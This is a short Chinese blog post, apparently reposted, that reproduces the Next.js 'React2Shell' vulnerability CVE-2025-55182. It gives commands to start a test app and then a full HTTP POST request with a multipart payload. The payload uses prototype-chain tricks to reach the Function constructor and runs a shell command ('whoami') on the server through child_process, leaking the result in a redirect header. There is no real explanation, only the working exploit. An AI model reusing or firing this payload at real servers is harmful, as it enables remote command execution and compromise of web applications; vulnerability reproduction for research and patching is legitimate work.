React2Shell CVE-2025-55182 复现
文章描述了如何通过npx和npm命令启动一个Next.js应用,并提供了一个HTTP POST请求示例,后续将分析相关漏洞原理。 2025-12-8 03:51:59 Author: www.o2oxy.cn(查看原文) 阅读量:27 收藏
文章描述了如何通过npx和npm命令启动一个Next.js应用,并提供了一个HTTP POST请求示例,后续将分析相关漏洞原理。 2025-12-8 03:51:59 Author: www.o2oxy.cn(查看原文) 阅读量:27 收藏
一、环境启动
npx [email protected] my-next-app npm run dev -- -H 0.0.0.0
启动完之后访问 IP:3000 端口
POST / HTTP/1.1
Host: 192.168.1.72:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 701
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B1337\"}","_response":{"_prefix":"var res=process.mainModule.require('child_process').execSync('whoami').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});","_chunks":"$Q2","_formData":{"get":"$1:constructor:constructor"}}}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"
"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"
[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
漏洞原理分析将在下一篇文章进行分析
文章来源: https://www.o2oxy.cn/4460.html
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh